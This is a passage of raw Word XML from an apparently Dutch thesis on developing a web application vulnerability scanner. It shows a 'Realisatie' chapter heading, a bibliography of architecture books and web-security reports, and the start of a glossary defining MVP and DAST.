C&#10;LQAUAAYACAAAACEA5JnDwPsAAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNd&#10;LnhtbFBLAQItABQABgAIAAAAIQAjsmrh1wAAAJQBAAALAAAAAAAAAAAAAAAAACwBAABfcmVscy8u&#10;cmVsc1BLAQItABQABgAIAAAAIQCQAC1VnAIAANIFAAAOAAAAAAAAAAAAAAAAACwCAABkcnMvZTJv&#10;RG9jLnhtbFBLAQItABQABgAIAAAAIQA5qo9d3gAAAAoBAAAPAAAAAAAAAAAAAAAAAPQEAABkcnMv&#10;ZG93bnJldi54bWxQSwUGAAAAAAQABADzAAAA/wUAAAAA&#10;" fillcolor="#e7e6e6 [3214]" strokecolor="#e7e6e6 [3214]" strokeweight="1pt">
                <v:fill opacity="19789f"/>
                <w10:wrap type="through"/>
              </v:rect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00AC48EF">
        <w:rPr>
          <w:b/>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251798528" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="773F8674" wp14:editId="589BFC00">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>598805</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>625475</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4753610" cy="3549650"/>
            <wp:effectExtent l="0" t="0" r="0" b="635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753610" cy="3549650"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="006E6370" w:rsidRPr="000E0169">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D15DE27" w14:textId="0C3BB4C1" w:rsidR="008A7BD0" w:rsidRPr="00D53265" w:rsidRDefault="005E6F4D" w:rsidP="005E6F4D">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_Toc491022096"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6.</w:t>
      </w:r>
      <w:r w:rsidR="00093695">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="001E5F9D">
        <w:t>Realisatie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="52"/>
    </w:p>
    <w:p w14:paraId="20508633" w14:textId="6E215637" w:rsidR="00D81245" w:rsidRPr="00D81245" w:rsidRDefault="00AB19C8" w:rsidP="00D81245">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251830272" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="0FF56F73" wp14:editId="53D94DD2">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1270</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>300990</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4509135" cy="678180"/>
                <wp:effectExtent l="0" t="0" r="37465" b="33020"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="43" name="Text Box 43"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4509135"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55721BD" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00AB19C8">
                            <w:r>
                              <w:t>Deelvraag</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="23026B60" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00AB19C8">
                            <w:r>
                              <w:t>Wat is het ontwikkelproces voor het realiseren van de webapplicatie scanner?</w:t>
                            </w:r>
                          </w:p>
                          <w:p w14:paraId="3AB61E56" w14:textId="347FB9AA" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5" w:rsidP="00AB19C8"/>
                          <w:p w14:paraId="77B69870" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5" w:rsidP="00AB19C8"/>
                          <w:p w14:paraId="330300AB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5" w:rsidP="00AB19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56F73" id="Text Box 43" o:spid="_x0000_s1121" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:.1pt;margin-top:23.7pt;width:355.05pt;height:53.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TzYoCAACLBQAADgAAAGRycy9lMm9Eb2MueG1srFRLTxsxEL5X6n+wfC+bQAIhYoNSEFUlBKhJ&#10;xdnx2sSq7XFtJ7vpr2fs3U0iyoWql93xvOebx9V1YzTZCh8U2JIOTwaUCMuhUvalpD+Xd18mlITI&#10;bMU0WFHSnQj0evb501XtpuIU1qAr4Qk6sWFau5KuY3TTogh8LQwLJ+CERaEEb1jEp38pKs9q9G50&#10;cToYnBc1+Mp54CIE5N62QjrL/qUUPD5KGUQkuqSYW8xfn7+r9C1mV2z64plbK96lwf4hC8OUxaB7&#10;V7csMrLx6i9XRnEPAWQ84WAKkFJxkWvAaoaDN9Us1syJXAuCE9wepvD/3PKH7ZMnqirp6IwSywz2&#10;aCmaSL5CQ5CF+NQuTFFt4VAxNsjHPvf8gMxUdiO9SX8siKAckd7t0U3eODJH48Hl8GxMCUfZ+cVk&#10;OMnwFwdr50P8JsCQRJTUY/cyqGx7HyJmgqq9Sgpm4U5pnTuobWIE0KpKvPxIIyRutCdbhs2PTU4a&#10;XRxp4au1FHlUuiip4LawTMWdFsmhtj+ERKhyfe9EYJwLG/soWTtpScznI4adfjJts/qI8d4iRwYb&#10;98ZGWfAZzbxbB2CqX33KstVHnI/qTmRsVk2ekcmkb/wKqh3Og4d2o4Ljdwqbds9CfGIeVwhHAM9C&#10;fMSP1FCXFDqKkjX4P+/xkz5ONkopqXElSxp+b5gXlOjvFmf+cjgapR3Oj9H44hQf/liyOpbYjbkB&#10;bPwQD5DjmUz6Ufek9GCe8XrMU1QUMcsxNk5KT97E9lDg9eFiPs9KuLWOxXu7cDy5TjCnkVw2z8y7&#10;bm4jTvwD9MvLpm/Gt9VNlhbmmwhS5dlOQLeodg3Ajc8j312ndFKO31nrcENnrwAAAP//AwBQSwME&#10;FAAGAAgAAAAhAKIFD4jfAAAABwEAAA8AAABkcnMvZG93bnJldi54bWxMjsFqwkAURfeF/sPwCt3V&#10;iWlqJM1EWkUoYhdqEZdj5jUJzbwJmVHj3/e5apeXe7j35LPBtuKMvW8cKRiPIhBIpTMNVQq+dsun&#10;KQgfNBndOkIFV/QwK+7vcp0Zd6ENnrehEjxCPtMK6hC6TEpf1mi1H7kOibtv11sdOPaVNL2+8Lht&#10;ZRxFE2l1Q/xQ6w7nNZY/25NV8LG7rjbp/HNiV++Lw3ov/X65WCv1+DC8vYIIOIQ/GG76rA4FOx3d&#10;iYwXrYKYOQVJmoDgNh1HzyCOjL0kMcgil//9i18AAAD//wMAUEsBAi0AFAAGAAgAAAAhAOSZw8D7&#10;AAAA4QEAABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAA&#10;ACEAI7Jq4dcAAACUAQAACwAAAAAAAAAAAAAAAAAsAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAA&#10;ACEAg9/TzYoCAACLBQAADgAAAAAAAAAAAAAAAAAsAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYA&#10;CAAAACEAogUPiN8AAAAHAQAADwAAAAAAAAAAAAAAAADiBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAA&#10;AAAEAAQA8wAAAO4FAAAAAA==&#10;" filled="f" strokecolor="black [3213]">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="455721BD" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00AB19C8">
                      <w:r>
                        <w:t>Deelvraag</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="23026B60" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRDefault="00CE4BB5" w:rsidP="00AB19C8">
                      <w:r>
                        <w:t>Wat is het ontwikkelproces voor het realiseren van de webapplicatie scanner?</w:t>
                      </w:r>
                    </w:p>
                    <w:p w14:paraId="3AB61E56" w14:textId="347FB9AA" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5" w:rsidP="00AB19C8"/>
                    <w:p w14:paraId="77B69870" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5" w:rsidP="00AB19C8"/>
                    <w:p w14:paraId="330300AB" w14:textId="77777777" w:rsidR="00CE4BB5" w:rsidRPr="007A3319" w:rsidRDefault="00CE4BB5" w:rsidP="00AB19C8"/>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="558A26D5" w14:textId="786C4C37" w:rsidR="00D81245" w:rsidRDefault="00D81245" w:rsidP="00D81245"/>
    <w:p w14:paraId="528B4EF3" w14:textId="77777777" w:rsidR="00AB19C8" w:rsidRDefault="00AB19C8"/>
    <w:p w14:paraId="45609C11" w14:textId="77777777" w:rsidR="00AB19C8" w:rsidRDefault="00AB19C8"/>
    <w:p w14:paraId="40F4B293" w14:textId="754E1531" w:rsidR="00BB3DF3" w:rsidRDefault="00BB3DF3" w:rsidP="00BB3DF3">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="53" w:name="_Toc491022097"/>
      <w:r w:rsidRPr="00BB3DF3">
        <w:t>Scope</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> van de realisatie</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
    </w:p>
    <w:p w14:paraId="42133110" w14:textId="77777777" w:rsidR="00BB3DF3" w:rsidRPr="00BB3DF3" w:rsidRDefault="00BB3DF3" w:rsidP="00BB3DF3"/>
    <w:p w14:paraId="17FF8EBA" w14:textId="77777777" w:rsidR="00BB3DF3" w:rsidRPr="00BB3DF3" w:rsidRDefault="00BB3DF3" w:rsidP="00BB3DF3"/>
    <w:p w14:paraId="6DB4D17D" w14:textId="06737FEE" w:rsidR="00D81245" w:rsidRDefault="00D81245">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D846ECE" w14:textId="130C88A6" w:rsidR="00886D84" w:rsidRPr="0089550C" w:rsidRDefault="00886D84" w:rsidP="001876C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="54" w:name="_Toc491022098"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0089550C">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Bronnenlijst</w:t>
      </w:r>
      <w:bookmarkEnd w:id="54"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="004C1CC5" w14:textId="0F827A93" w:rsidR="007D3A19" w:rsidRPr="006E0DB5" w:rsidRDefault="007D3A19" w:rsidP="007D3A19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E0DB5">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Boeken</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="02F86D37" w14:textId="242A7264" w:rsidR="007D3A19" w:rsidRPr="006E0DB5" w:rsidRDefault="00AE6CA1" w:rsidP="007D3A19">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E0DB5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">R. S. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E0DB5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Sangwan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="000070BF" w:rsidRPr="006E0DB5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0DB5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve"> Softwa</w:t>
      </w:r>
      <w:r w:rsidR="00BD6FC8" w:rsidRPr="006E0DB5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>re and Systems Architecture in A</w:t>
      </w:r>
      <w:r w:rsidRPr="006E0DB5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>ction</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A7CD8" w14:textId="6A318CE3" w:rsidR="00DA739A" w:rsidRPr="00DA22A1" w:rsidRDefault="00FC4DF5" w:rsidP="007D3A19">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006E0DB5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">H. Cervantes, R. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006E0DB5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Kazman</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006E0DB5">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t xml:space="preserve">, Designing Software Architecture: </w:t>
      </w:r>
      <w:r w:rsidRPr="00DA22A1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>A Practical Approach</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFB14B2" w14:textId="70264AA2" w:rsidR="007D3A19" w:rsidRPr="00DA22A1" w:rsidRDefault="00362C19" w:rsidP="007D3A19">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00DA22A1">
        <w:rPr>
          <w:b/>
          <w:sz w:val="22"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>Internetbronnen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="2C9B9FB1" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId77" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://sucuri.net/website-security/Reports/Sucuri-Website-Hacked-Report-2016Q1.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="694A0E62" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId78" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://assets.documentcloud.org/documents/3527813/IBM-XForce-Index-2017-FINAL.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5916B192" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId79" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://essextec.com/wp-content/uploads/2015/09/xforcereport2q2014.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="56A7246D" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00886D84" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA22A1">
        <w:rPr>
          <w:rStyle w:val="Hyperlink"/>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:t>https://motherboard.vice.com/en_us/article/vv7mvb/55-healthcare-data-breaches-have-hit-more-than-100-million-people-in-2015</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="652D4323" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId80" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="147571E1" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId81" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://www.sectoolmarket.com/price-and-feature-comparison-of-web-application-scanners-unified-list.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="789E883F" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId82" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://pc-en-internet.infonu.nl/geschiedenis/84250-het-web-web-10-web-20-web-30.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="74DDCBF9" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId83" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.ibm.com/security/data-breach/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7BE70FA8" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId84" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.owasp.org/index.php/Category:Vulnerability_Scanning_Tools</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="6A509824" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId85" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.acunetix.com/resources/wvsbrochure.pdf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30E97D83" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId86" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://torquemag.io/2016/10/13-surprising-wordpress-statistics-updated-2016/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="0880DBAA" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId87" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://ithemes.com/2017/01/16/wordpress-security-issues/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5277D0C3" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId88" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.techempower.com/benchmarks/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5990B808" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId89" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>https://www.sitepoint.com/best-php-framework-2015-sitepoint-survey-results/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1FF0FA07" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00CE4BB5" w:rsidP="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId90" w:history="1">
        <w:r w:rsidR="00886D84" w:rsidRPr="00DA22A1">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:lang w:val="en-GB"/>
          </w:rPr>
          <w:t>http://projects.webappsec.org/w/page/13246978/Threat%20Classification</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="1769B4EE" w14:textId="77777777" w:rsidR="00886D84" w:rsidRPr="00DA22A1" w:rsidRDefault="00886D84">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DA22A1">
        <w:rPr>
          <w:lang w:val="en-GB"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2EC317" w14:textId="302AF23C" w:rsidR="0022176D" w:rsidRDefault="009B6571" w:rsidP="001876C7">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc491022099"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Bijlage</w:t>
      </w:r>
      <w:r w:rsidR="00F014DB">
        <w:t xml:space="preserve"> A</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
    </w:p>
    <w:p w14:paraId="3410B13D" w14:textId="26FB97F8" w:rsidR="00F57BDD" w:rsidRDefault="00EF688B" w:rsidP="001876C7">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="56" w:name="_Toc491022100"/>
      <w:r>
        <w:t>Glossary</w:t>
      </w:r>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="7D3590C3" w14:textId="62E33278" w:rsidR="00971C22" w:rsidRDefault="00AB602D" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>MVP</w:t>
      </w:r>
      <w:r w:rsidR="00B84806" w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="002F1214">
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="002F1214" w:rsidRPr="002F1214">
        <w:t>en</w:t>
      </w:r>
      <w:r w:rsidR="002F1214" w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F1214">
        <w:t>minimal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F1214">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002F1214">
        <w:t>viable</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002F1214">
        <w:t xml:space="preserve"> product is een product da</w:t>
      </w:r>
      <w:r w:rsidR="00C007F7">
        <w:t xml:space="preserve">t aan de minimale functionele eisen voldoet. Als voorbeeld neem ik een inlogsysteem. De minimale functionele eisen van een inlogsysteem is dat een gebruiker ermee kan inloggen. Bouw je een “herinner mij” functie in dan is het niet meer minimaal en volgt het niet </w:t>
      </w:r>
      <w:r w:rsidR="00971C22">
        <w:t>meer het principe van een MVP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C36158D" w14:textId="41141310" w:rsidR="000A66B5" w:rsidRDefault="00AF220F" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00582A37">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>DAST</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
